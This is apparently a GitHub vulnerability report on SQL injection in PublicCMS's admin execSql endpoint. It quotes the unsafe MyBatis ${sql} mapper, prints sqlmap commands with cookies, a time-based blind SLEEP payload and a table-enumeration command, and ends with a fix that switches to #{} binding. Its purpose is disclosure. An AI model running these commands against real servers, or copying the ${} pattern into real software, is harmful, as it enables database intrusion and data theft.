This is a database maintenance function for super administrators
This is not a common SQL query. It has a SQL injection vulnerability, which may not only cause information disclosure, but also cause the server to be remotely controlled and backdoor installed
Where SQL injection vulnerability code appears
com.publiccms.controller.admin.sys.SysSiteAdminController
`@RequestMapping("execSql")
sqlService.update(sql)=>SqlMapper.xml
<mapper namespace="com.publiccms.logic.mapper.tools.SqlMapper"> <select id="select" parameterType="String" resultType="map">${sql}</select> <select id="query" parameterType="String" resultType="map">${sql}</select> <insert id="insert" parameterType="String">${sql}</insert> <update id="update" parameterType="String">${sql}</update> <delete id="delete" parameterType="String">${sql}</delete> </mapper>Url address is http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql
post data:"_csrf=353b342a-075c-4a71-9f13-c20e5b30b603&sql=111221"
Parameter 'sql' is not filtered and controllable
we can use sqlmap to test the vulnerability:
python sqlmap.py -u http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql --cookie "PUBLICCMS_ADMIN=1_353b342a-075c-4a71-9f13-c20e5b30b603; JSESSIONID=BBA83A42D2455445CFE0A504F287C9DB; Hm_lvt_4674b425370d9f190347b297042ae0b1=1552053320" --data "_csrf=353b342a-075c-4a71-9f13-c20e5b30b603&sql=111221" --level 3 --dbms mysql
sqlmap identified the following injection point(s) with a total of 751 HTTP(s) requests:
Parameter: sql (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: _csrf=353b342a-075c-4a71-9f13-c20e5b30b603&sql=(SELECT * FROM (SELECT(SLEEP(5)))CKuT)
[20:45:23] [INFO] the back-end DBMS is MySQL web application technology: JSP
back-end DBMS: MySQL >= 5.0.12
view the tables in PublicCMS databases:

python sqlmap.py -u http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql --cookie "JSESSIONID=70640223FE44003BC029AAAB54D24BC8; PUBLICCMS_ADMIN=1_2df43cfb-9546-4cdb-8150-6482f1b028de;Hm_lvt_4674b425370d9f190347b297042ae0b1=1552053320" --data "_csrf=2df43cfb-9546-4cdb-8150-6482f1b028de&sql=111" --level 5 -D publiccms --tables
how to fix:
${} (不安全的写法)
使用 ${foo} 这样格式的传入参数会直接参与SQL编译,类似字符串拼接的效果,是存在SQL注入漏洞的。
#{}
使用 #{} 做参数绑定时, MyBatis 会将SQL语句进行预编译,避免SQL注入的问题。
The text was updated successfully, but these errors were encountered: